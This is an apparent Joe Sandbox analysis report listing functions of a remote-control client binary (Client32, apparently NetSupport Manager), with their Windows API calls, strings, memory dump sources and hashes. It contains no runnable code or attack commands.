                                                                                      Function 110B90A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                      • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                      • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                      • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                      • API String ID: 1092798621-1973987134
                                                                                      • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                      • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                      • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                      • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                      Function 1112B340 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                        • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                      • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                      • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                      • _calloc.LIBCMT ref: 1112B3AD
                                                                                      • _free.LIBCMT ref: 1112B44B
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                      • String ID: ntohl$ws2_32.dll
                                                                                      • API String ID: 2881363997-4165132517
                                                                                      • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                      • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                      • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                      • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                      Function 1100F3D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3FD
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100F420
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 1100F4A4
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1100F4B2
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4C5
                                                                                      • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F4DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 2427920155-3145022300
                                                                                      • Opcode ID: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                      • Instruction ID: 370362221ca7244b6b9d163162d4a533615f3e9481550f6b861c2319f727a088
                                                                                      • Opcode Fuzzy Hash: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                      • Instruction Fuzzy Hash: 1D31A07AD042169FDB11DF94C890BAEF7B8FB04368F51426DEC61A7280DB71AD04CB92
                                                                                      Function 11017510 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeStringUninitializeW@16
                                                                                      • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                      • API String ID: 1826621714-1320232752
                                                                                      • Opcode ID: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                      • Instruction ID: ec2d2041e6adeb1d612fb4c2d78acfda5a53ba2d11cec2f487d5e4dde2f70ea0
                                                                                      • Opcode Fuzzy Hash: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                      • Instruction Fuzzy Hash: BE317075A0061A9BDB24DF54CD457EAB3B8EF08315F0040E9E909AB244EB75FA84CF50
                                                                                      Function 110F1270 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F12C5
                                                                                      • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F12DA
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1333
                                                                                      • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1378
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                      • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                      • API String ID: 1318148156-3179819359
                                                                                      • Opcode ID: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                      • Instruction ID: ccc4368b31194543ced42f6667aa0c2d7b9d0de7acad865b100199d2ac62ce57
                                                                                      • Opcode Fuzzy Hash: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                      • Instruction Fuzzy Hash: E431C171A44725AFD724DF64D891B96F7F5EB08708F008168E2B88B6C0D3B1B984CB94
                                                                                      Function 1115F100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                      • API String ID: 3960414890-2201682149
                                                                                      • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                      • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                      • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                      • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                      Function 11003380 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 110033BA
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 110033DC
                                                                                      • DestroyMenu.USER32(00000000), ref: 110033EA
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                      • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                      • API String ID: 468487828-934300333
                                                                                      • Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                      • Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
                                                                                      • Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                      • Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
                                                                                      Function 11003290 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadMenuA.USER32(00000000,00002EF9), ref: 1100329D
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 110032C3
                                                                                      • GetMenuItemCount.USER32(00000000), ref: 110032E7
                                                                                      • DestroyMenu.USER32(00000000), ref: 110032F9
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                      • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                      • API String ID: 4241058051-934300333
                                                                                      • Opcode ID: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
                                                                                      • Instruction ID: ea916ae31ccda8615c5aa97c2145fcab3b24ed556d1c3993920dd856584db00e
                                                                                      • Opcode Fuzzy Hash: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
                                                                                      • Instruction Fuzzy Hash: F8F02E3EE945BA73D31266F53C0DF8BFA584F526ACB060030F434FA645EE14A40081A6
                                                                                      Function 11119160 Relevance: 12.2, APIs: 8, Instructions: 209COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 11119200
                                                                                      • ClientToScreen.USER32(?,?), ref: 11119241
                                                                                      • GetCursorPos.USER32(?), ref: 111192A1
                                                                                      • GetTickCount.KERNEL32 ref: 111192B6
                                                                                      • GetTickCount.KERNEL32 ref: 11119337
                                                                                      • WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
                                                                                      • WindowFromPoint.USER32(000000FF,?), ref: 111193AE
                                                                                      • SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ClientCountCursorFromPointTickWindow$RectScreen
                                                                                      • String ID:
                                                                                      • API String ID: 4245181967-0
                                                                                      • Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                      • Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
                                                                                      • Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                      • Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
                                                                                      Function 11025122 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                      • _strncat.LIBCMT ref: 1102518B
                                                                                      • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                      • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                      • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                      • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                      • SetFocus.USER32(?), ref: 11025265
                                                                                        • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
